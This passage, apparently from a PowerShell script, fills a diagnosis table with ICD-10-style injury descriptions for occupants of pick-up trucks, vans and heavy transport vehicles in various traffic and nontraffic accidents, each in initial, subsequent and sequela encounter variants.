$DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Driver of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Passenger in pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Person on outside of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Driver of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Driver of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Driver of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with other nonmotor vehicle","Person boarding or alighting a pick-up truck or van injured in collision with other nonmotor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with other nonmotor vehicle","Person boarding or alighting a pick-up truck or van injured in collision with other nonmotor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with other nonmotor vehicle","Person boarding or alighting a pick-up truck or van injured in collision with other nonmotor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Driver of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Driver of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Driver of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Passenger in pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Person on outside of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Driver of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Driver of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Driver of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Passenger in pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Passenger in pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Passenger in pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Person on outside of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Person on outside of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Person on outside of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with fixed or stationary object","Person boarding or alighting a pick-up truck or van injured in collision with fixed or stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with fixed or stationary object","Person boarding or alighting a pick-up truck or van injured in collision with fixed or stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in collision with fixed or stationary object","Person boarding or alighting a pick-up truck or van injured in collision with fixed or stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Driver of pick-up truck or van injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Driver of pick-up truck or van injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Driver of pick-up truck or van injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Passenger in pick-up truck or van injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Passenger in pick-up truck or van injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Passenger in pick-up truck or van injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Person on outside of pick-up truck or van injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Person on outside of pick-up truck or van injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Person on outside of pick-up truck or van injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in noncollision transport accident in nontraffic accident","Driver of pick-up truck or van injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in noncollision transport accident in nontraffic accident","Driver of pick-up truck or van injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in noncollision transport accident in nontraffic accident","Driver of pick-up truck or van injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in noncollision transport accident in nontraffic accident","Passenger in pick-up truck or van injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in noncollision transport accident in nontraffic accident","Passenger in pick-up truck or van injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in noncollision transport accident in nontraffic accident","Passenger in pick-up truck or van injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in noncollision transport accident in nontraffic accident","Person on outside of pick-up truck or van injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in noncollision transport accident in nontraffic accident","Person on outside of pick-up truck or van injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in noncollision transport accident in nontraffic accident","Person on outside of pick-up truck or van injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in noncollision transport accident in nontraffic accident","Unspecified occupant of pick-up truck or van injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in noncollision transport accident in nontraffic accident","Unspecified occupant of pick-up truck or van injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in noncollision transport accident in nontraffic accident","Unspecified occupant of pick-up truck or van injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in noncollision transport accident","Person boarding or alighting a pick-up truck or van injured in noncollision transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in noncollision transport accident","Person boarding or alighting a pick-up truck or van injured in noncollision transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pick-up truck or van injured in noncollision transport accident","Person boarding or alighting a pick-up truck or van injured in noncollision transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in noncollision transport accident in traffic accident","Driver of pick-up truck or van injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in noncollision transport accident in traffic accident","Driver of pick-up truck or van injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in noncollision transport accident in traffic accident","Driver of pick-up truck or van injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in noncollision transport accident in traffic accident","Passenger in pick-up truck or van injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in noncollision transport accident in traffic accident","Passenger in pick-up truck or van injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in noncollision transport accident in traffic accident","Passenger in pick-up truck or van injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in noncollision transport accident in traffic accident","Person on outside of pick-up truck or van injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in noncollision transport accident in traffic accident","Person on outside of pick-up truck or van injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of pick-up truck or van injured in noncollision transport accident in traffic accident","Person on outside of pick-up truck or van injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in noncollision transport accident in traffic accident","Unspecified occupant of pick-up truck or van injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in noncollision transport accident in traffic accident","Unspecified occupant of pick-up truck or van injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in noncollision transport accident in traffic accident","Unspecified occupant of pick-up truck or van injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident","Driver of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident","Driver of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident","Driver of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident","Driver of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident","Driver of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident","Driver of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident","Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident","Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident","Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other motor vehicles in nontraffic accident","Passenger in pick-up truck or van injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other motor vehicles in nontraffic accident","Passenger in pick-up truck or van injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other motor vehicles in nontraffic accident","Passenger in pick-up truck or van injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident","Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in unspecified nontraffic accident","Occupant (driver) (passenger) of pick-up truck or van injured in unspecified nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in unspecified nontraffic accident","Occupant (driver) (passenger) of pick-up truck or van injured in unspecified nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in unspecified nontraffic accident","Occupant (driver) (passenger) of pick-up truck or van injured in unspecified nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident","Driver of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident","Driver of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident","Driver of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other motor vehicles in traffic accident","Driver of pick-up truck or van injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other motor vehicles in traffic accident","Driver of pick-up truck or van injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of pick-up truck or van injured in collision with other motor vehicles in traffic accident","Driver of pick-up truck or van injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident","Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident","Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident","Passenger in pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other motor vehicles in traffic accident","Passenger in pick-up truck or van injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other motor vehicles in traffic accident","Passenger in pick-up truck or van injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in pick-up truck or van injured in collision with other motor vehicles in traffic accident","Passenger in pick-up truck or van injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in traffic accident","Unspecified occupant of pick-up truck or van injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in transport accident with military vehicle","Occupant (driver) (passenger) of pick-up truck or van injured in transport accident with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in transport accident with military vehicle","Occupant (driver) (passenger) of pick-up truck or van injured in transport accident with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in transport accident with military vehicle","Occupant (driver) (passenger) of pick-up truck or van injured in transport accident with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in other specified transport accidents","Occupant (driver) (passenger) of pick-up truck or van injured in other specified transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in other specified transport accidents","Occupant (driver) (passenger) of pick-up truck or van injured in other specified transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in other specified transport accidents","Occupant (driver) (passenger) of pick-up truck or van injured in other specified transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in unspecified traffic accident","Occupant (driver) (passenger) of pick-up truck or van injured in unspecified traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in unspecified traffic accident","Occupant (driver) (passenger) of pick-up truck or van injured in unspecified traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of pick-up truck or van injured in unspecified traffic accident","Occupant (driver) (passenger) of pick-up truck or van injured in unspecified traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Driver of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Driver of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Driver of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Passenger in heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Passenger in heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Passenger in heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with pedestrian or animal","Person boarding or alighting a heavy transport vehicle injured in collision with pedestrian or animal, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with pedestrian or animal","Person boarding or alighting a heavy transport vehicle injured in collision with pedestrian or animal, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding 